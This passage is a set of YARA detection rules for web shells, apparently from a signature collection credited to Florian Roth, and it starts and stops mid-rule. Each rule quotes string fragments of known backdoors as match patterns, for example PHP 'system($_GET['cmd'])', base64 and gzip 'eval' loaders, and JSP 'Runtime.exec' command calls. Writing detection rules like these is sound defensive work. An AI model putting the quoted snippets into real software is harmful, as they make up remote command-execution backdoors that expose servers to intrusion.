+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/" 
+   condition: 
+      all of them
+}
+
+rule Webshell_wsb_idc_RID2D81 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file idc.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:34:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
+      $s3 = "{eval($_GET['idc']);}" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_cpg_143_incl_xpl_RID308F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cpg_143_incl_xpl.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:45:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA" 
+      $s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_mumaasp_com_RID2F38 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file mumaasp.com.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:47:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR" 
+   condition: 
+      all of them
+}
+
+rule Webshell_php_404_a_RID2DA5 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 404.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:40:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$pass = md5(md5(md5($pass)));" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_webshell_cnseay_x_RID31B5 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file webshell-cnseay-x.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:34:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_" 
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_up_RID2D2E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file up.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:20:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio" 
+      $s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_ASP_cmd_2_RID2DAE : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmd.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:42:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_g00nv13_RID2DFC : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file g00nv13.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:55:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas" 
+      $s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p" 
+   condition: 
+      all of them
+}
+
+rule Webshell_php_h6ss_RID2DD1 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file h6ss.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:48:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php eval(gzuncompress(base64_decode(\"" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Ani_Shell_RID2E15 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Ani-Shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:59:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$Python_CODE = \"I" 
+      $s6 = "$passwordPrompt = \"\\n=================================================" 
+      $s7 = "fputs ($sockfd ,\"\\n===============================================" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_jsp_k8cmd_RID2E29 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file k8cmd.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:02:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_cmd_1_RID2E16 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmd.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:59:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_k81_RID2D26 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file k81.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:19:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
+      $s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_ASP_zehir_RID2E0B : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file zehir.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:57:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Worse_Linux_Shell_1_RID320C : DEMO LINUX SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Worse Linux Shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:48:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, LINUX, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD" 
+   condition: 
+      all of them
+}
+
+rule Webshell_zacosmall_RID2E6C : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file zacosmall.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:13:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>" 
+   condition: 
+      all of them
+}
+
+rule Webshell_redirect_RID2DF8 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file redirect.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:54:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" " 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_cmdjsp_RID2ED3 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmdjsp.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:31:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_Java_Shell_RID2E7F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Java Shell.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:17:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
+      $s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_asp_1d_RID2CDE : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 1d.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:07:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_IXRbE_RID2DEC : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file IXRbE.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:52:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_G5_RID2C69 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file G5.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 09:48:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_r57142_RID2D62 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file r57142.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:29:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_tree_RID2E02 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file tree.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:56:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki" 
+      $s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ" 
+   condition: 
+      all of them
+}
+
+rule Webshell_C99madShell_v_3_0_smowu_RID3315 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file smowu.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:32:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for" 
+      $s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_simple_backdoor_RID30D4 : DEMO MAL SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file simple-backdoor.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:56:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+      $s1 = "if(isset($_REQUEST['cmd'])){" fullword
+      $s4 = "system($cmd);" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_PHP_404_b_RID2D46 : DEMO SCRIPT T1087 T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 404.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:24:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Antichat_Shell_v1_3_2_RID3252 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Antichat Shell v1.3.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:00:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Safe_mode_breaker_RID3164 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Safe mode breaker.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:20:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is(" 
+      $s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)." 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Sst_Sheller_RID2F0E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Sst-Sheller.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:40:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>" 
+      $s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHPJackal_v1_5_RID2F6E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file PHPJackal v1.5.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:56:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form" 
+      $s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr" 
+   condition: 
+      all of them
+}
+
+rule Webshell_customize_RID2E89 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file customize.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:18:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z" 
+   condition: 
+      all of them
+}
+
+rule Webshell_s72_Shell_v1_1_Coding_RID3222 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file s72 Shell v1.1 Coding.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:52:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya " 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_guige02_RID2EC5 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file guige02.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:28:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff" 
+      $s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private" 
+   condition: 
+      all of them
+}
+
+rule Webshell_WinX_Shell_RID2E83 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file WinX Shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:17:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam" 
+      $s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Crystal_Crystal_RID30C9 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Crystal.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:54:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value" 
+      $s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f" 
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_ajn_RID2D82 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file ajn.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:34:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
+      $s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve" 
+   condition: 
+      all of them
+}
+
+rule Webshell_php_cmd_RID2D81 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmd.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:34:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if($_GET['cmd']) {" fullword
+      $s1 = "// cmd.php = Command Execution" fullword
+      $s7 = "  system($_GET['cmd']);" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_list_RID2E05 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file list.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:56:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
+      $s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_co_RID2CBF : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file co.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:02:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
+      $s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_150_RID2C83 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 150.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 09:52:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "HJ3HjqxclkZfp" 
+      $s1 = "<? eval(gzinflate(base64_decode('" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_cmdjsp_2_RID2F64 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmdjsp.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:55:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+      $s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_c37_RID2CBA : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file c37.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:01:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj')," 
+      $s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE]," 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_b37_RID2CB9 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file b37.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:01:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc" 
+   condition: 
+      all of them
+}
+
+rule Webshell_php_backdoor_RID2F92 : DEMO MAL SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file php-backdoor.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:02:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
+      $s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input " 
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_dabao_RID2E40 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file dabao.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:06:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &" 
+      $s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-" 
+   condition: 
+      all of them
+}
+
+rule Webshell_php_2_RID2C7F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 2.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 09:51:41"
+      score = 70
+      customer = "demo"
